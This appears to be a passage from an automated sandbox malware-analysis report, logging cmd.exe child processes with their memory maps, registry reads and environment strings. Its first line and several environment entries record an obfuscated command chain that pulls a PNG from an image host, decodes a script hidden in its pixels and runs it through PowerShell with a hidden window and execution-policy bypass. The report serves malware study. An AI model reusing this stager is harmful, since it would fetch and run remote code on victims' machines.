| Get Environment String | name = *[-,, result_out = set suLrv=. ( $sHelLId[1]+$shELlId[13]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'ype -As'+'sembly'+'Name 9axSystem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr Syste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr By'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[Syst'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]34).ReplaCE(([ChAr]98+[ChAr]83+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]36))^&^& seT aDIzy=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc byPASS -nOPrOFIle -COmMANd ^^^^^^^&( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 |
Process #12: cmd.exe
621
0
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd ; |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:58, Reason: Child Process |
| Unmonitor | End Time: 00:01:15, Reason: Self Terminated |
| Monitor Duration | 00:00:17 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb78 |
| Parent PID | 0xb50 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B7C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x00044fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00041fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x001cffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x00236fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0044ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000470000 | 0x00470000 | 0x005f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000600000 | 0x00600000 | 0x00780fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x01b8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001b90000 | 0x01b90000 | 0x01ed2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001ee0000 | 0x01ee0000 | 0x01fdffff | Private Memory | rw |
|
|
|
- |
| basebrd.dll | 0x01fe0000 | 0x020a7fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000020b0000 | 0x020b0000 | 0x024a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x024b0000 | 0x0277efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002780000 | 0x02780000 | 0x0297ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x49e40000 | 0x49e98fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fee69d0000 | 0x7fee69d7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (565)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
2 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
9 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
4 | |
| Open | STD_OUTPUT_HANDLE | - |
|
35 | |
| Open | STD_INPUT_HANDLE | - |
|
257 | |
| Read | STD_INPUT_HANDLE | size = 1, size_out = 1 |
|
249 | |
| Read | STD_INPUT_HANDLE | size = 1, size_out = 0 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 36 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 63 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 26 |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xb80, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Get Info | C:\Windows\system32\cmd.exe | type = PROCESS_BASIC_INFORMATION |
|
1 |
Memory (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | C:\Windows\system32\cmd.exe | address = 0x7fffffdf000, size = 896 |
|
1 |
Module (10)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | NTDLL.DLL | base_address = 0x77c40000 |
|
1 | |
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49e40000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77b20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77b36d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x77b323d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77b28290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x77b317e0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationProcess, address_out = 0x77c914a0 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-06 08:01:17 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 125986 |
|
1 | |
| Get Info | type = Operating System |
|
1 |
Environment (21)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
3 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = {foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math] |
|
1 | |
| Get Environment String | name = adizY |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #13: cmd.exe
62
0
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd.exE /c %adizY% |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:58, Reason: Child Process |
| Unmonitor | End Time: 00:01:15, Reason: Self Terminated |
| Monitor Duration | 00:00:17 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb80 |
| Parent PID | 0xb78 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B84
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x00044fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00041fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00153fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00170fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00290000 | 0x002f6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x004cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004d0000 | 0x004d0000 | 0x00657fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000660000 | 0x00660000 | 0x007e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x01beffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001bf0000 | 0x01bf0000 | 0x01f32fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001f40000 | 0x01f40000 | 0x0203ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02040000 | 0x0230efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x49e40000 | 0x49e98fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fee69d0000 | 0x7fee69d7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Open | - | - |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xb88, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | os_pid = 0xb90, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49e40000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77b20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77b36d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x77b323d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77b28290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x77b317e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-06 08:01:17 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 126298 |
|
1 |
Environment (20)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
5 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
3 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
4 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
2 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = adizY, result_out = EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) |POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc byPASS -nOPrOFIle -COmMANd ^&( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT ) |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
2 |
Process #14: cmd.exe
50
0
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /S /D /c" EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) " |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:58, Reason: Child Process |
| Unmonitor | End Time: 00:01:00, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb88 |
| Parent PID | 0xb80 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B8C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x00045fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00041fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0045ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x0055ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000560000 | 0x00560000 | 0x006e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006f0000 | 0x006f0000 | 0x00870fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000880000 | 0x00880000 | 0x01c7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c80000 | 0x01c80000 | 0x01fc2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001fd0000 | 0x01fd0000 | 0x020cffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x49e40000 | 0x49e98fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fee69d0000 | 0x7fee69d7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (12)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
